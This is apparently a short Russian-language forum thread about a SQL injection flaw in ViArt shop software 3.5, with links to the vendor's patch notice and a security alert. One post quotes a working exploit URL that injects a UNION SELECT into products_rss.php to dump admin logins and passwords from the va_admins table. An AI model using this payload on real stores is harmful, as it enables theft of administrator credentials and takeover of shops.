Не знаю какая дата появления этой публикации, но разработчики всегда оперативно реагируют на такие вещи и сразу выходят патчи....Эксплоит:
/products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*
вы не знаете, исправили? или после 3.5 ничего не выходило?
Вот сообщение о патче ещё в августе:
_http://www.viart.com/another_critical_sql_injection_security_fix_for_version_3_5.html
А вот ещё недавнее предупреждение и советы как обезопасить магазин:
_http://www.viart.com/security_alert_hack_attempts_for_version_3_5.html